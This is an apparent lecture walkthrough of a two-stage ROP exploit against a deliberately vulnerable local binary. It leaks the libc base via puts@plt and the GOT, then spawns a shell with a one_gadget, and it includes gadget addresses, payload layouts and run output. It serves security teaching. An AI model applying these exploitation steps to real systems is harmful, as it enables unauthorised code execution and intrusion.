An example of exploitation using ROP

This example demonstrates some key techniques in exploiting a stack-based buffer overflow vulnerability to launch a shell using ROP. There are three files included:

basic_rop.c: the source code for the target binary.
basic_rop: the target binary.
rop.py: the solution script (in python)

To make the problem slightly more interesting, we require that the ASLR is enabled, so the libc base address (and the buffer address) are randomized.

Analysis

The target binary basic_rop is a simple program that prints out a string, accepts an input from the user and simply echoes back the input. There is an obvious vulnerability in the main() function; it allocates 8 bytes in the stack of main(), but allows an input of up to 64 bytes. This potentially allows us to change the return pointer and execute arbitrary code.

The binary does not have the stack guard enabled, and is a non-PIE binary, as can be seen from the output of checksec.

bash 复制代码

[*] '/home/user1/lectures/rop/basic_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

It is also dynamically linked, so we know that the libc functions' addressess are loaded into GOT when they are resolved (after the first call to such a function).

The stack is, however, non-executable, so we can't simply inject shell code there. This leaves us with the only option of using existing code in the executable segments of the binary. Two possible places to find such executable code: the binary itself and the libraries it loads (libc or ld). Using code already in the binary is the preferred option here as it is a non-PIE binary, so the addresses of instructions in the binary are fixed -- so they are not randomly relocated to different addresses every time the binary is run.

But before start crafting a ROP chain to launch a shell, we will have to figure out how far off is the return address from the start of the buffer. We can do this statically (e.g., examining the disassembly of the binary) or dynamically (e.g., using gdb). We will use the latter, just to demonstrate a particularly common technique to find offsets of return address using de Bruijn sequences.

Determining the return address offset

You can skip this section if you are not interested in this particular technique of using de Bruijn sequences. The binary is simple enough that the offset can be determined by a quick look at the disassembly.

A de Bruijn sequence with a period of N is a string such that every substring of length N occurs in the string exactly once. This means in particular that given a substring of length N, we can determine exactly its offset relative to the start of the string.

For our example, we will generate a de Bruijn string with period 8. If we overflow the buffer with such a sequence, and it overwrites the stored RBP or the stored return pointer, we can easily determine the offset of the stored RBP by examining the byte pattern of RBP.

We can use either pwntools or gef to generate de Bruijn sequences. We show here an example using pwntools.

python 复制代码

>>> from pwn import *
>>> cyclic(64, n=8)
b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa'
>>>

This generates a string of length 64, with a period of 8 (so every substring of length 8 is unique).

We then use this string as an input, in a gdb session, to figure out the return address offset. We set a break point right after the call to fgets (determined by looking at the disassembly of basic_rop) and input the de Bruijn sequence we generated above.

gef➤ break *0x401186
gef➤  run
gef➤  
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa
gef➤  x/gx $rbp
0x7fffffffe070: 0x6161616161616162

We see that the stored RBP has been overwritten. The pattern command in GEF would help us figure out the offset of this pattern 0x6161616161616162 in the input we provided.

gef➤  pattern search 0x6161616161616162
[+] Searching for '6261616161616161'/'6161616161616162' with period=8
[+] Found at offset 8 (little-endian search) likely

GEF tells us that the stored RBP is stored 8 bytes above the buffer address, which means that the return address is stored at 16 bytes above the buffer. We'll use this information to construct our payload later.

Exploitation

The first hurdle in creating a payload that launches a shell is that it typically requires a syscall gadget, but no such gadgets are present in the basic_rop binary. For example:

bash 复制代码

$ ROPgadget --binary ./basic_rop | grep syscall

does not show anything. There are plenty of syscall gadgets in libc --

but to use them, we need to know the libc base address, and since ASLR is enabled, this base changes with every run. So our first hurdle is to exploit the buffer overflow bug to leak the libc base address (stage 1), and then using the knowledge of the libc base, craft a ROP chain to execute /bin/sh (stage 2).

Stage 1: Leaking the libc base

The idea is quite simple: we puts to output its own (real) address. Since this binary is dynamically linked, and it is a non-PIE binary, we know precisely where the real address of puts is stored -- in the GOT entry for puts in the .got.plt section. To initiate a call to put, we use its address in the .plt section (actually it's in the .plt.sec for this binary). Both the GOT entry and the .plt address of puts can be found by a simple objdump command:

bash 复制代码

$ objdump -M intel -dj .plt.sec basic_rop

basic_rop:     file format elf64-x86-64

Disassembly of section .plt.sec:

0000000000401050 <puts@plt>:
  401050:       f3 0f 1e fa             endbr64 
  401054:       f2 ff 25 bd 2f 00 00    bnd jmp QWORD PTR [rip+0x2fbd]        # 404018 <puts@GLIBC_2.2.5>
  40105b:       0f 1f 44 00 00          nop    DWORD PTR [rax+rax*1+0x0]

...

So to print the real address of puts, we call puts@plt, setting its argument to point to its GOT entry 0x404018.

Since this is a 64-bit binary, by the linux calling convention for x86-64, this argument must be loaded to the rdi register, so we will need find a ROP gadget to do that (and it can't be in libc -- we still don't have the libc base!).

Fortunately, there is a pop rdi gadget in the basic_rop binary itself:

bash 复制代码

$ ROPgadget --binary basic_rop | grep 'pop rdi ; ret'
0x0000000000401203 : pop rdi ; ret

So we can now construct a payload to overflow the buffer and print the address of puts. The stack configuration after the overflow should look something like this:

[puts@plt address (0x401050) ]
[GOT entry of puts (0x404018)]
[pop rdi gadget (0x401203)   ]  -->  return address location
[16 bytes of padding         ] 
-----------------------------------  start of buffer

This payload will overflow the buffer and overwrite the return address of main() with the pop rdi gadget, so when main() returns, it will trigger the ROP chain to print the puts address in libc.

Once we get the address of puts, we can find the libc base by subtracting puts's address with the relative offset of puts with respect to the libc base. The latter is fixed, and can be found by querying the symbol of puts in the libc file (e.g., using pwnlib.elf library -- see the exploit code).

Note however, we don't want to end the exploit here, as if the program quits, next time we run it the libc address will change so the address we obtained above will be useless for the second stage attack. Instead we want to launch the second stage attack in the same run of the program. The trick here is to add the main() function itself at the end of the ROP chain, so after the libc address is leaked, we will start the main function again to perform another overflow, but this time equipped with the knowledge of the libc base. So the actual Stage 1 payload is:

[main() address              ]
[puts@plt address (0x401050) ]
[GOT entry of puts (0x404018)]
[pop rdi gadget (0x401203)   ]  -->  return address location
[16 bytes of padding         ] 
-----------------------------------  start of buffer

Stage 2: launching shell

After a successful attack at Stage 1, we will have the libc base, and we have triggered the (re-)execution of the main function. Now our goal is to overflow the buffer in main() again, but with a different ROP chain, aimed to launch a shell.

We could construct a ROP chain manually to call execve syscall with argument /bin/sh, but this is such a common task in exploitation that there is already a tool that specifically finds such a gadget for us -- the one_gadget tool. Running this tool on libc, we find:

bash 复制代码

$ one_gadget /lib/x86_64-linux-gnu/libc-2.31.so 
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL || r15 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL || r15 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

The command shows three possible "one gadgets". The "constraints" under each gadget describes what conditions must be satisfied for that gadget to execute successfully. For example the first one_gadget, which is located at offset 0xe3afe from the libc base, is meant to execute execve("/bin/sh", r15, r12), where r15 and r12 satisfy one of the following conditions: (1) they point to null values, or (2) both r15 and r12 are null, or (3) they point to valid argv (arguments) and envp (environment variables) arrays.

So we will have to make sure at least one of these three conditions is satisfied when this gadget is executed. For that, we will use another gadget to set the registers r12 and r15 to NULL. There happens to be such a gadget in basic_rop:

bash 复制代码

ROPgadget --binary basic_rop | grep 'pop r15' | grep 'pop r12'
0x00000000004011fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004011fb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

The gadget we want is at 0x4011fb, but it does a bit more than popping stack elements to r12 and r15. It also pops into r13 and r14. So to use this gadget, we need to stack 4 elements on top of it.

The second stage payload should therefore look like the following:

[one_gadget (libc_base + 0xe3afe)   ]                       ]
[32 bytes of 0x00                   ]
[pop r12 to r15 gadget (0x4011fb)   ]  -->  return address location
[16 bytes of padding                ] 
------------------------------------------  start of buffer

The entire attack has been automated using a python script (rop.py). Running this will get us the shell.

bash 复制代码

$ python3 rop.py
user1@comp3703:~/lectures/rop$ python3 rop.py 
[*] '/home/user1/lectures/rop/basic_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './basic_rop': pid 24532
b'Hello, type something\n'
b'AAAAAAAAAAAAAAAA\x03\x12@\n'
puts address: 0x7fcc443d9420
libc base: 0x7fcc44355000
b'Hello, type something\n'
[*] Switching to interactive mode
$ ls
README.md  basic_rop  basic_rop.c  rop.py
$